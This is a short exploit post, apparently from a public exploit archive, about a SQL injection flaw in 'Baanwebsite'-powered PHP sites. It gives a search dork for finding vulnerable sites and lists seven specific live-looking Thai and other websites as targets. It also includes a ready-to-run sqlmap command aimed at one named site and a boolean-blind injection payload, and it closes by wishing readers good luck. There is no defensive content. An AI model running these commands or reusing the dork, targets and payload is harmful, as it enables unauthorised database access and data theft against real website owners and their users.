Information Exploit
[+] Exploit Title: Baanwebsite Sql İnjection Vulnerability
[+] Author : Cxsecurity.com and Magelang1337
[+] Dork : inurl:/php.?id= "Powered by บ้านเว็บไซต์"
[+] Tested on : BackBox 5.1, Chrome
On Target :
- http://www.onlinesolution.co.th/news/view.php?id=17[inject]
- http://steelline.co.th/product/view.php?prod_id=78[inject]
- http://www.zhanbua.com/product/view.php?id=122[inject]
- http://www.smartparkthailand.com/activities/view.php?id=9[inject]
- http://steelline.co.th/product/view.php?prod_id=8[inject]
- http://www.nyexpert87.com/products/view.php?id=32[inject]
- http://www.shizconfa.co.th/portfolio/view.php?id=4[inject]
[+] SQLMAP Poc :
sqlmap -u "http://www.onlinesolution.co.th/news/view.php?id=17" --dbs
[+] Poc SQL Injection :
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 9007=9007 AND 'pOJG'='pOJG
Sumber Bugs Exploit : [https://cxsecurity.com/issue/WLB-2018050129]
Video tutorial
good luck.. and hopefully useful...
0 Comments